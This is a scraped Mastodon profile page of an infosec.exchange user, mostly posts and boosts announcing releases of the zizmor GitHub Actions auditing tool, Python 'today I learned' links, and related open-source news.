yossarian (1.3.6.1.4.1.55738)

@yossarian@infosec.exchange
1.4K Followers
134 Following
1.1K Posts

open source interloper; attracts bugs easily

אַ ביסל ייִדיש־פּאָסטינג

websitehttps://yossarian.net
bloghttps://blog.yossarian.net
githubhttps://github.com/woodruffw
blueskyhttps://bsky.app/profile/yossarian.net
yossarian (1.3.6.1.4.1.55738)6h ago
very pleased to see that zizmor's mystery 1.5.2 user is finally starting(?) to migrate off of it
yossarian (1.3.6.1.4.1.55738)1d ago

TIL: Python 3.15's new buffer size

https://yossarian.net/til/post/python-3-15-s-new-buffer-size/

#til #python #performance

TIL: Python 3.15's new buffer size

yossarian (1.3.6.1.4.1.55738)4d ago
David Lord 4d ago
Just released gha-update 0.2.0! https://github.com/davidism/gha-update/releases/tag/0.2.0 Use this tool to pin and update GitHub actions locally rather than with Dependabot. I wrote about why I made this tool here: https://davidism.com/disabling-scheduled-dependency-updates/
Release 0.2.0 · davidism/gha-update

This is the gha-update 0.2.0 feature release. PyPI: https://pypi.org/project/gha-update/0.2.0/ Changes: https://gha-update.readthedocs.io/page/changes/#version-0-2-0 Follow redirects for moved pro...

GitHub
yossarian (1.3.6.1.4.1.55738)5d ago

TIL: Overriding pytest fixtures

https://yossarian.net/til/post/overriding-pytest-fixtures/

#til #python #testing

TIL: Overriding pytest fixtures

yossarian (1.3.6.1.4.1.55738)6d ago
Tobias Bieniek6d ago

🦀 ICYMI: "Trusted Publishing" on crates.io is now officially shipped! 🎉

https://blog.rust-lang.org/2025/07/11/crates-io-development-update-2025-07/

tl;dr you can now publish via GitHub Actions without setting up a secret API token

#rustlang

crates.io: development update | Rust Blog

Empowering everyone to build reliable and efficient software.

yossarian (1.3.6.1.4.1.55738)Jul 9
fastapi is so good
yossarian (1.3.6.1.4.1.55738)Jun 30

zizmor v1.11.0 is released!

this is a much smaller release than v1.10.0, but it comes with an experimental feature that's been in the works for a long time: LSP support!

with `zizmor --lsp` you can now integrate zizmor directly into your editor/IDE. we even have an (experimental) vscode extension already: https://marketplace.visualstudio.com/items?itemName=zizmor.zizmor-vscode

see the full notes here: https://docs.zizmor.sh/release-notes/

#rust #security #opensource #github

yossarian (1.3.6.1.4.1.55738)Jun 27
great post from the folks over at grafana about how they’re using zizmor at scale across their whole estate: https://grafana.com/blog/2025/06/26/how-to-detect-vulnerable-github-actions-at-scale-with-zizmor/
How to detect vulnerable GitHub Actions at scale with Zizmor | Grafana Labs

In order to harden our infrastructure and pipelines, we have introduced the open source tool Zizmor into our CI/CD pipelines.

Grafana Labs
yossarian (1.3.6.1.4.1.55738)Jun 26
what’s the matter babe? you haven’t touched your 50 pounds of raisinettes
yossarian (1.3.6.1.4.1.55738)Jun 26

zizmor v1.10.0 is released!

this is a *huge* new release in terms of features, bugfixes, and enhancements. just to highlight a few:

* zizmor's new experimental fix mode is now available! users can use `--fix=[MODE]` to control it; see the docs for more: https://docs.zizmor.sh/usage/#auto-fixing-results

* the new anonymous-definition audit flags unnamed workflows and jobs for the pedantic persona: https://docs.zizmor.sh/audits/#anonymous-definition

* zizmor's location/fixture core has been rewritten to support "subfeatures," meaning that many audits now produce much nicer/more precise finding renders that are easier to read

read the full release notes here: https://docs.zizmor.sh/release-notes/#1100

#rust #security

Usage - zizmor

Usage tips and recipes for running zizmor locally and in CI/CD.

×
yossarian (1.3.6.1.4.1.55738)Jun 20

sneak peek for more precise subspanning within zizmor:

(this overcomes one of zizmor's earliest architectural limitations, i.e. that it could only span on full YAML elements and nothing within those elements. no longer!)

Show threadyossarian (1.3.6.1.4.1.55738)Jun 20
compare to the old render, which knew which part of the code block was problematic but couldn't span it discretely: